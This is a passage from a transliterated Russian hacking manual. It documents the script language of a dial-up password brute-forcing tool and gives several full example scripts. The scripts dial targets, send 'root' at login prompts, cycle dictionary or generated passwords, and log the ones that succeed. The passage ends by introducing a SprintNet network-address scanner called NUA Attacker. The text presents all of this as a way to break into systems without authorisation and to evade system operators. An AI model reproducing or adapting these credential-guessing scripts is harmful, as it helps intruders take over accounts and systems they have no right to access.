ignorirovat'sya,  to  est' snachala idet podbor aaaa, zatem aaab, zatem aaac i
t.d.
     Naprimer:
     FROM_BRUTE(1)=2527
     Sekciya #NOCARRIER
     |to  budet  vypolnyat'sya  vsyakij  raz, kogda  vy  ne ispol'zuete komandu
HANGUP. Esli v skripte otsutstvuyut operatory GOTO  (*START) ili GOTO (1), to
dal'she  on vypolnyat'sya  ne budet. |to oznachaet, chto  vy snova dolzhny nabrat'
modemnyj nomer dostupa k sisteme. Poetomu prover'te ustanovki v DIAL_TRIES.
     Sekciya #START
     V etoj vazhnoj sekcii opisyvayutsya operatory, kotorye v  dal'nejshem budut
lomat' sistemu.
     LOG(STRING)
     Komanda LOG() zapisyvaet v  fajl registracii nekotoruyu informaciyu.  |to
mozhet byt' lyuboj tekst, peremennye, pered kotorymi vsegda dolzhen stoyat' znak
$ (znak dollara),  a  takzhe probely  mezhdu  slovami.  V konec stroki  kazhdaya
komanda LOG() avtomaticheski pechataet vozvrat karetki.
     Primery:
     LOG(Beginning on $DATE * $TIME)
     Budet vyvedeno sleduyushchee:
     "Beginning on 24-12-96 * 23:00"
     LOG_(STRING)
     |tot primer analogichen vysheprivedennomu, za isklyucheniem togo, chto posle
teksta otsutstvuet CRLF (End-Of-Line).
     :NUMBER
     Kazhdaya liniya, nachinayushchayasya s : (dvoetochiya) markiruetsya operatorom GOTO.
Vy mozhete ispol'zovat' 240 markirovok v diapazone ot 1 do 240. Drugie nomera
nepriemlemy.  Perehod  k nuzhnomu  markeru osushchestvlyaetsya komandami  peredachi
upravleniya GOTO, GOSUB, CHECK4OUTPUT i CHECK4CARRIER.
     Naprimer: :1
     V  etom primere na sootvetstvuyushchuyu stroku vypolnyaetsya perehod k tochke s
nomerom 1.
     GOTO(NUMBER)
     Peredat' upravlenie na markirovku perehoda. Vy mozhete takzhe osushchestvit'
perehod komandami #START, #NOCARRIER i #END.
     Naprimer: GOTO(#END) (vypolnenie skripta zaversheno).
     GOSUB(NUMBER)
     S  komandoj  podstanovki  GOSUB vy  osushchestvlyaete  perehod  k sleduyushchej
markirovke. Komanda  GOSUB, kak pravilo  ispolnyaetsya uzhe  posle perehoda  na
sleduyushchij  marker,  to  est' v  tot moment, kogda  komandy  GOSUB  i  RETURN
stolknutsya mezhdu soboj. Obratite vnimanie, chto vot takaya komanda nevozmozhna:
GOSUB(#END).
     Naprimer: GOSUB(4)
     RETURN
     |to  tak  nazyvaemaya  komanda  vyhoda iz  podprogrammy.  Ispol'zuya  etu
komandu,  vy mozhete  vozvratit'sya  k  mestopolozheniyu  poslednej  vypolnennoj
komandy  GOSUB  i prodolzhit'  obychnoe  vypolnenie skripta.  Esli  v bufernom
registre  komanda  RETURN  stalkivaetsya  s  nesushchestvuyushchim nachal'nym adresom
GOSUB,  to  ona  budet  ignorirovat'sya. V  odnom bufernom registre vy mozhete
imet' do 255 podstanovok GOSUB.
     Naprimer: RETURN
     CHECK4CARRIER(NUMBER)
     Proverka modema  na soedinenie s  liniej, to est'  proverka na  nesushchuyu
chastototu.  Komanda  budet  vypolnyat'sya  v  sluchae   otsutstviya  perehoda  k
ukazannoj markirovke  (perehod  sootvetstvuet komande  GOTO).  Esli  perehod
obnaruzhen, to ustanavlivaetsya  vnutrennee soedinenie s peremennoj  TRUE  dlya
proverki  na NO_CARRIERS. Vy mozhete takzhe osushchestvlyat'  procedury perehoda k
*NOCARRIER, *START i *END. Takzhe vozmozhno osushchestvit' proverku modema tol'ko
na  ON  ili  OFF. Esli  komanda  CHECK4CARRIER(ON) vypolnena  s  perehodom k
markeru,  otmechayushchemu  obnaruzhenie  linii,  i,  esli   predstavlen  NOT,  to
upravlenie  peredaetsya  na  *NoCarrier. |ta  komanda  polezna tol'ko  v  tom
sluchae, kogda vy okazyvaetes' na CHECK4CARRIER(OFF) i ne hotite ispol'zovat'
komandu  DIAL,  chtoby  soedinit'sya  s udalennoj sistemoj (pozvol'te  nabrat'
nomer SCAVENGER DIALER).
     Primery:
     CHECK4CARRIER(#NOCARRIER)
     CHECK4CARRIER(5)
     CHECK4CARRIER(ON)
     CHECK4CARRIER(OFF)
     CHECK4OUTPUT(NUMBER)
     |to budet vypolneno podobno nizheopisannoj funkcii  ALARM: Esli vyhodnoj
signal  (OUTPUT)  modema   obnaruzhen,   to  perehody  budut   osushchestvlyat'sya
neposredstvenno k ukazannoj markirovke. Vy mozhete takzhe  peredat' upravlenie
k  *NOCARRIER,  *START i  *END. Takzhe vozmozhno otklyuchit' proverku na OFF, to
est' zablokirovat' ukazannuyu proverku vyhodnogo signala.
     Naprimer:
     CHECK4CARRIER(#NOCARRIER)
     CHECK4CARRIER(5)
     CHECK4CARRIER(OFF)
     DIAL
     Nabor  nomera PHONE_NR.  Esli  s  sistemoj net soedineniya, to snachala v
modem budet poslana komanda: "Povesit' trubku!".
     Naprimer: DIAL
     HANGUP
     Podnyat' i opustit' trubku.
     Naprimer: HANGUP
     WAIT4STRING(NUMBER,STRING,NUMBER,
     COMMAND,STRING)
     V predstavlennom zdes' yazyke skriptov eto  samaya vazhnaya  komanda. Posle
ee vypolneniya vyhodnoj  signal modema budet nahodit'sya v sostoyanii ozhidaniya.
V etot  moment dolzhna nachat'sya zagruzka  special'nogo  slova. Esli  stykovka
osushchestvlena, to skript prodolzhaetsya, esli -- net, to posle tajmauta v modem
budet  otpravlena zadannaya posledovatel'nost',  zatem  --  vnov'  tajmaut i,
nakonec, idet vypolnenie komandy.
     Vazhno:   Snachala  komanda   WAIT4STRING  proveryaet   tekushchuyu  stroku  s
predstavlennym slovom. Sintaksis: WAIT4STRING(a,b,c,d,e).
     a
     Opredelit'  tajmaut  v diapazone ot 0 do 255 sekund. Nol' sootvetstvuet
neogranichennomu ozhidaniyu,  to  est' zhdat' do  teh por  poka  ne nastupit tak
nazyvaemyj TOTAL TIMEOUT (skript perehodit v sekciyu #NOCARRIER v tom sluchae,
esli dannye ne  postupayut iz  modema v  techenie pyati  minut). Esli nichego ne
polucheno, to  posledovatel'nost' v potoke dannyh  raspoznaetsya snova,  ili v
kakoj-to moment nesushchaya chastota ob®yavlyaetsya poteryannoj.
     b
     Posledovatel'nost'   dannyh,  kotoraya   budet  poslana  v  modem  posle
tajmauta.
     c
     CHastota otkazov ili kolichestvo obshchego vremeni, v techenie kotorogo mozhet
vypolnyat'sya  fatal'naya komanda.  Diapazon: ot 0 do 255  (0=nikogda, 1=pervyj
raz).
     d
     Vypolnenie special'noj fatal'noj komandy. |to mogut byt' lyubye komandy,
isklyuchaya: ALARM, WAIT4STRING i IF.
     e
     Posledovatel'nost'  dannyh   dlya   ozhidaniya.  Dannye  chuvstvitel'ny   k
registru.
     Naprimer: WAIT4STRING(15,^M,2,GOTO(1),ogin:)
     V etom  primere proishodit ozhidanie posledovatel'nosti ogin: v  techenie
15 sekund. Esli stykovka ne poluchilas', a karetka vozvrashchaetsya v modem (^M),
to  komanda snova  zhdet  15  sekund,  poka  vnov'  ne  naladitsya  stykovka s
posledovatel'nost'yu dannyh ogin:.
     Kak tol'ko istekut sleduyushchie 15  sekund, vyzyvaetsya fatal'naya  komanda,
chto oznachaet perehod k GOTO s metkoj pod nomerom 1.
     LOG_SESSION_ON
     Nachinaya s etogo punkta, vse dannye postupayushchie iz modema zapisyvayutsya v
fajl registracii.
     Naprimer: LOG_SESSION_ON
     LOG_SESSION_OFF
     Esli soderzhimoe ekrana  zapisano v fajl registracii, to k  etomu punktu
bol'she ne budet obrashchenij.
     Naprimer: LOG_SESSION_OFF
     SEND(STRING)
     Komanda  SEND  peredaet posledovatel'nost' dannyh v  modem.  CHerez  etu
komandu vy  mozhete peresylat'  v  modem  peremennye  so znakom  $.  V  konec
posledovatel'nosti  peredaetsya  vozvrat  karetki.   Esli  posledovatel'nost'
dannyh ne zadana, to srazu osushchestvlyaetsya perehod na vozvrat karetki.
     Naprimer:
     SEND(echo Hacked you system Time: $TIME - Date:
     $DATE > HACKED.TXT)
     V dannom primere komanda SEND posylaet v modem sleduyushchuyu stroku:
     echo HAcked your system Time: 23:00 - Date: 24-12-95 > HACKED.TXT
     SEND_()
     |ta komanda analogichna vysheopisannoj, no ona ne posylaet v modem simvol
vozvrata karetki ^M. Ee mozhno ispol'zovat', esli vam nuzhno zagruzit' v modem
tol'ko odin simvol ili komandnyj rezhim +++.
     Primery:
     SEND_(n)
     SEND_(+++)
     SEND_NEXT_DIC(NUMBER)
     Naprimer: SEND_NEXT_DIC(1)
     SEND_DIC(NUMBER)
     Pereslat' tekushchij slovar' v modem.
     Naprimer: SEND_DIC(1)
     NEXT_DIC(NUMBER)
     Peremestit'sya na slovo, sootvetstvuyushchee argumentu NUMBER.
     Naprimer: NEXT_DIC(1)
     SEND_NEXT_BRUTE(NUMBER)
     Ispol'zuya Brute  Force  Generator,  sgenerirovat'  sleduyushchuyu dopustimuyu
posledovatel'nost' i pereslat' ee v modem.
     Naprimer: SEND_NEXT_BRUTE(1)
     SEND_BRUTE(NUMBER)
     Pereslat'  v  modem  tekushchuyu  posledovatel'nost'  dopustimyh  dannyh iz
slovarya Brute Force Generator.
     Naprimer: SEND_BRUTE(1)
     NEXT_BRUTE(NUMBER)
     Sgenerirovat' sleduyushchuyu dopustimuyu posledovatel'nost' dannyh iz slovarya
Brute Force Generator.
     Naprimer: NEXT_BRUTE(1)
     IF VARIABLE OPERATOR STRING THEN COMMAND
     Komanda IF pervoj versii etoj programmy ne ochen' gibkaya. Sintaksis etoj
komandy sleduyushchij:
     IF  THEN 
     
     
     Oznachaet  ravnosil'nost'  pri   argumente  =,  bol'she  ili  men'she  pri
argumentah   <  ili  >   sootvetstvenno   i   peremennuyu  soderzhashchuyu   lyubuyu
posledovatel'nost' slov  pri argumente  ~.  Peremennye  i posledovatel'nosti
dolzhny byt' diskretnymi peremennymi.
     
     |ta komanda vypolnitsya v tom sluchae, esli budet soblyudeno uslovie TRUE.
CHtoby ee ispol'zovat', prosmotrite spisok komand dlya operatora WAIT4STRING.
     Naprimer:
     IF STRING~ogin THEN GOTO(3)
     To  est',   esli  tekushchaya  stroka   (STRING)  soderzhit  diskretnuyu  (~)
posledovatel'nost' dannyh ogin, to idti (GOTO) k markeru s nomerom 3.
     EXECUTE(STRING)
     Vypolnit' DOS-programmu, a  zatem zapustit' skript.  Vy dolzhny vklyuchit'
peremennye  v vypolnyaemu stroku. Vy takzhe  dolzhny  vypolnit' sootvetstvuyushchie
vnutrennie komandy MS DOS. Pomnite, chto pered peremennoj mozhet stoyat' znak $
s vozmozhnymi probelami pozadi i vperedi samogo znaka.
     Vazhno: Esli vy hotite  zapustit' programmu v to vremya, kogda  po vashemu
skriptu osushchestvleno soedinenie, to vy dolzhny ispol'zovat' drajver fossil. V
protivnom sluchae vash komp'yuter zavisnet. Poetomu zapustite X00.EXE E 2 pered
vypolneniem programmy Login Hacker.
     Vazhno:  CHtoby  vasha   programma  ne  byla   povrezhdena,  predvaritel'no
sohranite ee v kataloge otlichnom ot ishodnogo.
     Primery:
     EXECUTE(C:\SB\VPLAY C:\SB\VOC\HACKED.VOC)
     EXECUTE(COPY $LOGFILE C:\HACKED)
     ALARM(STRING,COMMAND)
     Opasno!  Nazhimat'  na  spuskovoj kryuchok!  Esli na udalennom  komp'yutere
srabotala  sistema  zashchity,  to  vy  budete  aktivny do  teh  por,  poka  ne
vypolnitsya eta komanda.
     STRING
     Posledovatel'nost',  dlya  kotoroj  osushchestvlyaetsya  poisk  dannyh  s  ih
posleduyushchej peredachej v modem.
     COMMAND
     |ta komanda budet  vypolnena  posle  stykovki.  CHtoby ee  ispol'zovat',
prosmotrite listing  komand dlya  WAIT4STRING.  Primenite etu komandu  v  tom
sluchae, naprimer, esli vy vzlomali BBS, a sisop vas raskusil i zadaet glupye
voprosy.   Posle  etoj  komandy   vy  avtomaticheski  prervete  soedinenie  i
ostanovite vypolnenie skripta.
     Naprimer:
     ALARM(chat,GOTO(#END))
     SET VARIABLE=STRING
     |toj komandoj vy opredelyaete peremennuyu v sekcii #START ili #NOCARRIER.
Esli peremennaya yavlyaetsya staticheskoj peremennoj, to vy  dolzhny eto otmetit'.
Vy dolzhny  ustanavlivat' tol'ko  sleduyushchie  peremennye: STRING,  DIAL_TRIED,
LOGIN_TRIED, S_TMP i D_TMP.
     Naprimer:
     SET D_TMP=3
     Opredelit' staticheskuyu peremennuyu D_TMP v kachestve 3.
     INC(DIGIT_VARIABLE)
     Uvelichit' chislo ukazannoj peremennoj na 1. |ta komanda budet  vypolnena
lish' v tom sluchae, esli peremennaya posle dopolneniya ne nahoditsya v ukazannom
diapazone.
     Imeyut  silu  sleduyushchie  komandy: DIAL_TRIES,  DIAL_TRIED,  LOGIN_TRIES,
LOGIN_TRIED i D_TMP.
     Naprimer: INC(D_TMP)
     DEC(DIGIT_VARIABLE)
     Umen'shit' chilo ukazannoj peremennoj  na  1. |ta komanda budet vypolnena
lish' v tom sluchae, esli peremennaya posle  vychitaniya ne budet  nahodit'sya vne
ukazannogo diapazona.
     Imeyut  silu  sleduyushchie  komandy:  DIAL_TRIES,  DIAL_TRIED, LOGIN_TRIES,
LOGIN_TRIED i D_TMP.
     Naprimer:
     DEC(D_TMP)
     WAIT(NUMBER)
     Ozhidat' do teh por, poka idut sekundy, opredelennye  argumentom NUMBER.
Argument NUMBER sootvetstvuet lyubomu chislu v diapazone ot 1 do 65535.
     Naprimer: WAIT(10) (desyat' sekund)
     WAIT_(NUMBER)
     Ozhidat'  do teh por, poka idut  millisekundy,  opredelennye  argumentom
NUMBER.  Argument  NUMBER  sootvetstvuet lyubomu  chislu v  diapazone  ot 1 do
65535.
     Naprimer: WAIT(500) (polsekundy)
     BEEP
     Sozdaet signal, pohozhij na legkij zvuk bibikalki!
     Peremennye i upravlyayushchie simvoly
     Rech' idet o  peremennyh,  kotorye mogut byt'  ispol'zovany  v  komandah
SEND()  ili LOG(). Kak uzhe otmechalos', zakachka peremennyh  v modem  ili fajl
registracii   opredelyaetsya   simvolom  $   (dollara),   postavlennym   pered
sootvetstvuyushchej  peremennoj,  i  probelami. Vy  mozhete ispol'zovat'  #DEFINE
lyubye specificheskie peremennye. Vam ih nuzhno tol'ko opredelit'.
     STRING
     Simvoly peresylayutsya iz modema v poslednyuyu stroku.
     STRING2
     Poslednie 250 simvolov otpravlyayutsya iz modema.
     DIAL_TRIED
     Fakticheskie popytki nabora nomera.
     LOGIN_TRIED
     Fakticheskie popytki poluchit' imya i parol'.
     TIME
     Dejstvitel'noe  vremya  v  chasah  i  minutah  (dvoetochie  propuskaetsya).
Naprimer, TIME=1505 oznachaet 15:05.
     DATE
     Tekushchaya data v formate MMDD. Naprimer, DATE=503 oznachaet 3 maya.
     DIC(1)
     Tekushchij zagruzhennyj slovar' 1.
     BRUTE(2)
     Tekushchaya stroka slovarya Brute Force Generator 2.
     S_TMP
     Peremennaya stroka. Vy mozhete ee ispol'zovat', kak vam nravitsya.
     D_TMP
     Peremennaya dlya cifr. Vy mozhete ee ispol'zovat', kak vam nravitsya.
     V komandah IF i  SET vy mozhete ispol'zovat' isklyuchitel'no vysheopisannye
peremennye. Peremennye iz #DEFINE isklyuchayutsya. Tol'ko staticheskie peremennye
i  konstanty  priemlemy dlya  IF!  Ne nuzhno takzhe ispol'zovat'  znak  $ pered
peremennoj. |tot znak dopustim tol'ko v komandah SEND, LOG i WAIT4STRING.
     Naprimer:
     IF TIME>1215 THEN GOTO #END
     (otsoedinit'sya posle 12:15).
     LOG($DIC(3))
     SEND($S_TMP)
     Teper'   otnositel'no   specsimvolov.   Vy   mozhete  zapisyvat'   lyubye
upravlyayushchie simvoly vmeste s komandami LOG, SEND ili WAIT4STRING  cherez znak
^  (shapochka). |to  oznachaet, chto vy mozhete vvesti, naprimer, ^M ili napisat'
^^ ... okej?, ili ispol'zovat' lyubye konstrukcii ot ^A do ^Z plyus ^[ ^\ ^] i
^^.
     Naprimer:
     SEND_(^D)
     #DEFINE
     
     #NOCARRIER
     
     #START
     
     #END
     Soobshcheniya ob oshibkah
     Esli  v  processe  kompilyacii  vy  poluchaete  soobshchenie  ob oshibke,  to
pomnite, chto  v  vashem  rasporyazhenii imeetsya fajl .BAK. Prosmotrite  i
vnimatel'no izuchite soderzhimoe etogo fajla.
     Pri  kompilirovanii  skripta  mozhet  vsplyt'  tol'ko  dva soobshcheniya  ob
oshibke:
     WARNING
     Vy  chto-to  ne tak skompilirovali. Kompilyator  v  lyubom sluchae  sozdast
skript,  kotoryj  mozhet  zapustit'sya  bez  vsyakih  problem.  |to  soobshchenie,
naprimer,  mozhet  byt'  vydano,  esli  nevozmozhno  najti ukazannyj  slovar'.
Vozmozhno, chto vy ne polnost'yu podgotovili kopiyu.
     ERROR
     |to   kriticheskaya  oshibka.   V   kakoj-to  moment  kompilyator   prerval
neobhodimuyu proceduru zaversheniya. Dlya ispravleniya etoj oshibki prover'te fajl
s rasshireniem .BAK i vash ishodnyj fajl.
     Primer standartnogo skripta
     #DEFINE
     PHONE_NR=,
     LOGFILE=lh&scave.log
     DIC(1)=d:\project\hack\word\badpws.dic
     ; zadajte korrektnyj put' k vashemu slovaryu
     #NOCARRIER
     IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
     LOG(Carrier lost on $DATE at $TIME)
     LOG()
     GOTO(#START)
     #START
     SET S_TMP=UNDEFINE
     ;SET S_TMP=DEFINE
     HANGUP
     LOG_SESSION_ON
     SET STRING2=
     IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s pickup.scr)
     IF S_TMP=UNDEFINE THEN SEND(AT H1)
     EXECUTE(scavenge.exe /nooutput /s thc&scav.scr)
     :111
     SEND(ATD)
     SET D_TMP=0
     :112
     WAIT(1)
     INC(D_TMP)
     IF D_TMP>50 THEN GOTO(99)
     CHECK4CARRIER(112)
     SEND()
     ; poslat' vozvrat karetki posle soedineniya
     :1
     WAIT(1)
     IF STRING2~assw THEN GOTO(2)
     GOTO(1)
     :2
     SEND_NEXT_DIC(1)
     WAIT(2)
     IF STRING2~ncorr THEN GOTO(3)
     GOTO(50)
     :3
     SET STRING2=
     :4
     WAIT(1)
     IF STRING2~assw THEN GOTO(5)
     GOTO(4)
     :5
     SEND_NEXT_DIC(1)
     WAIT(2)
     IF STRING2~ncorr THEN GOTO(6)
     GOTO(50)
     :6
     SET STRING2=
     :7
     WAIT(1)
     IF STRING2~assw THEN GOTO(8)
     GOTO(7)
     :8
     SEND_NEXT_DIC(1)
     WAIT4STRING(10,,1,GOTO(50),ncorr)
     GOTO(99)
     :50
     BEEP
     BEEP
     BEEP
     LOG(------------- -----------------)---- -------------------)
     LOG($DATE $TIME)
     LOG()
     LOG(PASSWORD: $DIC(1))
     LOG()
     GOTO(150)
     :99
     CHECK4CARRIER(OFF)
     IF S_TMP=UNDEFINE THEN GOTO(#START)
     EXECUTE(scavenge.exe /s rebreak.scr)
     ; sozdanie skripta dlya perenabora nomera i dozvona do celi
     GOTO(111)
     :150
     IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
     GOTO(#END)
     #END
     Pervyj primer skripta
     Sistemnyj deskriptor: UNIX na F.
     No vy nikogda ne dolzhny eto delat'.
     #DEFINE
     LOGFILE=C:\OUTPUT\NY-SYS5.LOG
     PHONE_NR=I dont tell you ;)
     DIAL_TRIES=3
     LOGIN_TRIES=0
     DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
     #NOCARRIER
     BEEP
     BEEP
     BEEP
     LOG(NO CARRIER)
     LOG(ON $DATE $TIME)
     LOG(AT $DIC(1))
     LOG()
     GOTO(#START)
     #START
     LOG(------------------------- -----)---- -------------------)
     LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
     LOG()
     :1
     LOG(Dialing ...)
     DIAL
     LOG($STRING)
     LOG_SESSION_ON
     SEND()
     SEND()
     WAIT4STRING(15,^M,4,GOTO(1),name)
     SEND( )
     LOG_SESSION_OFF
     :2
     SEND(CONNECT HACK.THIS.SYSTEM.EDU)
     :3
     WAIT4STRING(30,^C,1,GOTO(2),ogin:)
     SEND(root)
     WAIT4STRING(20,^D,1,GOTO(2),assword:)
     SEND_NEXT_DIC(1)
     IF STRING~ogin: THEN GOTO(3)
     IF STRING~refused THEN GOTO(2)
     LOG()
     LOG($STRING)
     LOG()
     LOG(!!!!! WE GOT THROUGH !!!!!!)
     LOG(Login : root)
     LOG(Password : $DIC(1))
     LOG()
     BEEP
     BEEP
     BEEP
     BEEP
     BEEP
     HANGUP
     GOTO(#END)
     #END
     Vtoroj primer skripta
     #DEFINE
     INIT_MODEM=AT&N15
     INIT_DATA=7E1
     LOGFILE=C:\OUTPUT\TELEKOM4.LOG
     PHONE_NR=I dont tell you ;)
     DIAL_TRIES=3
     LOGIN_TRIES=0
     BRUTE(1)=1,1,1,12
     #NOCARRIER
     BEEP
     BEEP
     BEEP
     LOG(NO CARRIER)
     LOG(ON $DATE $TIME)
     LOG(AT $BRUTE(1))
     LOG()
     GOTO(#START)
     #START
     LOG(-----------------------------------)---- ---------------)
     LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
     LOG()
     :1
     LOG(Dialing ...)
     HANGUP
     DIAL
     LOG($STRING)
     WAIT4STRING(15,^M,4,GOTO(1),PA)
     :2
     SEND_NEXT_BRUTE(1)
     WAIT4STRING(3,^M,2,GOTO(3),PA)
     GOTO(2)
     :3
     LOG_SESSION_ON
     SEND()
     SEND(?)
     SEND(HELP)
     SEND(HILFE)
     LOG()
     LOG(!!!!! WE GOT THROUGH !!!!!!)
     LOG(Password : $BRUTE(1))
     LOG()
     BEEP
     BEEP
     BEEP
     BEEP
     BEEP
     HANGUP
     GOTO(#END)
     #END
     Tretij primer skripta
     |tot skript mozhet byt' ispol'zovan na nekotoryh nebesplatnyh telefonnyh
liniyah 0130-xxxxxx.
     ; Sistema trebuet parol'
     ; Neogranichennoe kolichestvo popytok pozvolyaet vojti v sistemu
     ;
     ; 30xCrLf
     ; PASSCODE:*****
     ;
     #DEFINE
     INIT_MODEM=AT &F L2
     INIT_DATA=8N1
     LOGFILE=xxxxxx.LOG
     PHONE_NR=0130xxxxxx
     DIAL_TRIES=5
     LOGIN_TRIES=0
     DIC(1)=C:\2\thc-lh09\w1.w
     #NOCARRIER
     BEEP
     BEEP
     BEEP
     LOG(NO CARRIER)
     LOG(ON $DATE $TIME)
     LOG(AT $DIC(1))
     LOG()
     GOTO(#START)
     #START
     LOG(------------------- ---------)---- -------------)
     LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
     LOG()
     :1
     LOG(Dialing ...)
     HANGUP
     DIAL
     LOG($STRING)
     WAIT4STRING(30,.^M,3,GOTO(1),PASS)
     :2
     set string=
     SEND_NEXT_DIC(1)
     wait(1)
     LOG($DIC(1))
     ; da, registrirovat'sya s kazhdoj popytki!
     WAIT4STRING(15,.^M,3,GOTO(3),PASS)
     GOTO(2)
     :3
     LOG_SESSION_ON
     SEND()
     SEND(?)
     SEND(HELP)
     SEND()
     LOG()
     LOG(!!!!! WE GOT THROUGH !!!!!!)
     LOG(Password : $DIC(1))
     LOG()
     BEEP
     BEEP
     BEEP
     BEEP
     BEEP
     HANGUP
     GOTO(#END)
     #END
     CHetvertyj primer skripta
     |to skript prednaznachen isklyuchitel'no dlya platform Telnet.
     #DEFINE
     init_modem=z
     init_data=8n1
     LOGFILE=xxxxxx.log
     PHONE_NR=xxxxxx
     DIAL_TRIES=0
     LOGIN_TRIES=0
     DIC(1)=D:\hackusr\dictbig.txt
     ;dic(2)=d:\hackusr\bigdict2.txt
     ;dic(3)=d:\hackusr\bigdict3.txt
     #NOCARRIER
     LOG(NO CARRIER)
     LOG(ON $DATE $TIME)
     LOG(AT $DIC(1))
     LOG(returning ...)
     GOTO(#START)
     #START
     HANGUP
     LOG_SESSION_ON
     LOG()
     log()
     log( HaCK ATTeMPT STaRTeD ......)
     log()
     log( TaRGeT: $PHONE_NR )
     log( DaTe: $DATE )
     log( TiMe: $TIME)
     log()
     log()
     log( ......DiaLiNG)
     dial
     log()
     log( ......CoNNeCTeD!)
     log()
     log()
     wait(5)
     :1
     wait4string(1,^M,5,goto(#start),sername>)
     send(fh65)
     :2
     wait4string(1,^M,5,goto(#start),ocal>)
     send(connect 189.25.56.7)
     :3
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait4string(1,^C,5,goto(4),ogin:)
     send(root)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     :4
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait4string(1,^D,5,goto(4),assword:)
     send_next_dic(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     :5
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     :6
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     wait(1)
     if string~sconnected then goto(2)
     if string~ncorrect then goto(3)
     :7
     beep
     beep
     beep
     beep
     beep
     beep
     beep
     beep
     beep
     log()
     log()
     log()
     Log(...... HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!!)
     log()
     log( TaRGeT: $PHONE_NR DaTe: $DATE TiMe: $TIME)
     log()
     log()
     log()
     log( ACCouNT: root)
     log( PaSSWoRD: DIC(1))
     log()
     log()
     log()
     #END
     Skanirovanie adresov pol'zovatelej
     Operacii po skanirovaniyu setevyh  adresov my razberem na osnove  ves'ma
izvestnoj programmy Network User Address Attacker. |ta programma  izvestnogo
soobshchestva P/H/A.  NUA  Attacker  napisan na  Turbo  C  2.0 hakerom Doktorom
Dissektorom.  Network  User  Address  Attacker  skaniruet  klavishnuyu  panel'
SprintNet. Pri etom programma sposobna  raspoznat' oshibki kodov na SprintNet
i  drugih  tipah  soedinenij.  Kazhdyj  otskanirovannyj setevoj  adres  mozhet
zaregistrirovat'sya  pod  logfile s  opisaniem vozvrashchennogo koda oshibki  ili
kratkoj   summoj   dannyh  glavnoj   sistemy.   Takim   obrazom,   programma
dozvanivaetsya  do Net i  skaniruet  setevye  adresa pol'zovatelej.  Diapazon
skanirovaniya zadaetsya  atakuyushchim.  Krome  etogo, v  prilagaemom k  programme
fajle SND390.TXT  imeetsya spisok nekotoryh  modemnyh  telefonnyh nomerov. Vy
mozhete, konechno, ispol'zovat' tol'ko izvestnyj vam nomer, to est' tot nomer,
kotoryj naibolee blizko sootvetstvuet vashemu regionu.
     |ta  programma   mozhet  byt'  naibolee  poleznoj  pri  poiske  setej  s
kommutiruyushchimi  paketami ili na osnove UNIX.  Avtor etoj programmy nadeetsya,
chto lyubye  oshibki,  najdennye v nej, budut  peredany  cherez soobshchestvo P/H/A
hakeram Doktoru Dissektoru, Temnomu SHlemu, Korejcu Podavitelyu ili Anonimnomu
Anarhistu.
     Fajly programmy
     NUAA.EXE
     Programma NUA Attacker.
     NUAA.DOC
     Dokumentaciya
     README.PHA
     Prochtite eto snachala!
     SND390.TXT
     Spisok telefonnyh nomerov Net.
     NUAA.CFG
     Otchet o tekushchej atake i konfiguracii modema.
     NUAFILE.PHA
     Spisok setevyh adresov pol'zovatelej.
     LOGFILE.PHA
     Spisok  setevyh adresov pol'zovatelej,  sostavlennyh atakuyushchim.  V etom
fajle takzhe soderzhatsya kody otveta NUA, poluchennye atakuyushchim.
     Fajly  NUAfile  i  Logfile mogut modificirovat'sya.  Fajly NUAFILE.PHA i
LOGFILE.PHA -- eto obyknovennye tekstovye fajly,  vy mozhete redaktirovat' ih
v lyubom  tekstovom redaktore. Krome togo, esli fajl uzhe sushchestvuet, to lyubye
dannye  dobavyatsya k  tomu imeni fajla, kotorye sushchestvuyut v  fajle  s metkoj
EOF.
     Zapusk programmy
     Dlya zapuska NUA Attacker vvedite s vashej konsoli sleduyushchee:
     C:\ >NUAA [/I]
     Parametr /I pozvolyaet vam nachat' vypolnenie programmy bez inicializacii
modema pered skanirovaniem adresov. V etom sluchae, kogda vy vyberite komandu
Begin attack (Nachat'  napadenie),  NUA  Attacker  srazu  nachnet skanirovanie
adresov  (esli vy predvaritel'no zaregistrirovalis' v sisteme,  to teper' vy
snova dolzhny zaregistrirovat'sya na Net cherez priglashenie @).
     Nastrojka rezhima skanirovaniya
     Nastrojka  skanirovaniya  adresov  osushchestvlyaetsya  cherez  komandu  Setup
attack. V poyavivshemsya dialogovom okne vypolnite nastrojku sleduyushchih opcij.
     Phone Number
     Telefonnyj nomer Net (SND390.TXT).
     Starting NUA
     Nachal'nyj setevoj adres pol'zovatelya.
     Ending NUA
     Konechnyj setevoj adres pol'zovatelya.
     Timeout
     Vremya ozhidaniya otveta ot setevogo adresa pol'zovatelya.
     Log filename
     Imya fajla, v kotoryj budut vyvoditsya soobshcheniya ob oshibkah i  informaciya
o neudachnyh popytkah soedineniya.
     NUA filename
     Imya fajla, v  kotoryj budut vyvoditsya  setevye adresa pol'zovatelej (po
umolchaniyu eto fajl NUAFILE.PHA).
     Decimals
     Vklyuchit' ili otklyuchit' rezhim desyatichnogo skanirovaniya.
     Pol'zovateli  Net ispol'zuyut  setevye  adresa v formate  XXXXXX.XX. NUA
Attacker podderzhivaet skanirovanie desyatichnyh chisel.
     Naprimer, esli vy nastroite etu opciyu tak:
     Starting NUA: 619100.10
